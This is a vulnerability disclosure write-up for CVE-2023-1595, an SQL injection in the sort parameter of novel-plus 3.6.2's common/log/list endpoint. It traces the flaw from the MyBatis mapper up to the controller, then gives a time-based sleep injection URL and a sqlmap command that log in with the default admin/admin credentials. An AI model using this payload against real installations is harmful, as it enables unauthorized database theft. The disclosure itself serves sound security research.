Headline
CVE-2023-1595: novel-plus-v3.6.2----Background-SQL-Injection-Vulnerability-/novel-plus v3.6.2 -- Background SQL Injection Vulnerability.md at main · 1610349395/novel-plus-v3.6.2----Background-SQL-Injection-Vulnerabi
A vulnerability has been found in novel-plus 3.6.2 and classified as critical. Affected by this vulnerability is an unknown functionality of the file common/log/list. The manipulation of the argument sort leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223663.
novel-plus v3.6.2 – Background SQL Injection Vulnerability
Project address:https://github.com/201206030/novel-plus
Vulnerabilities affect products:novel-plus - v3.6.2
Vulnerability Description: Novel Plus is a multi terminal (PC, WAP) reading and fully functional CMS system for original literature. It is built based on Spring Cloud and uses MyBatis as the persistence layer. "It has a total of nearly 3k stars on Github, with a large number of users. It has a background SQL injection vulnerability, which can be used to obtain all database information. In severe cases, it can be used as a getshell, which poses considerable harm
Vulnerability White Box Audit:
Environment construction,For details, please refer to:https://www.xxyopen.com/2022/07/18/doc/novel-plus/install/package.html
After the construction is successful, access the project as shown in the figure:
Log in using the default password admin/admin
Source code audit:
Use the idea shortcut to globally search for '${’. In mybatis, ${} indicates that precompiled technology is not used
Let’s enter LogMapper.xml and view the code
It was found that the parameters ${sort} and ${order} that did not use precompiled processing exist in the<select>tag of this id=list, and they are enabled only if the sort parameter is not empty
Let’s go back to the dao layer and find the implementation of this select tag. We found the implementation of this select tag in the LogDao.java file, and the parameters that can be passed in are a map array
We continue to search for an implementation class for this function. Using the idea shortcut key curl+left click on the list function, we find that the LogServicelmpl.java file called this function.
View the LogServicelmpl.java file. The queryList function calls the list function and passes in the query parameter, which is a map array type
Continue curl+left click to find out who called the queryList function. This function is called in LogController.java, and the parameters are controllable. The path is http://localhost/common/log/list
poc:
http://127.0.0.1/common/log/list?limit=10&offset=0&operation=&order=desc&sort=(select*from(select%2Bsleep(1)union%2F**%2Fselect%2B1)a)&username=
Vulnerability recurrence:
First, log in to the background through the weak password admin/admin, and then use sqlmap to scan the URL corresponding to the target:
python3 sqlmap.py -u
“http://127.0.0.1/common/log/list?limit=10&offset=0&operation=&order=desc&sort=1” --cookie="JSESSIONID=6ab3b1c7-549b-4fc6-b04e-60f9cd4caea3"
Burp delay injection test: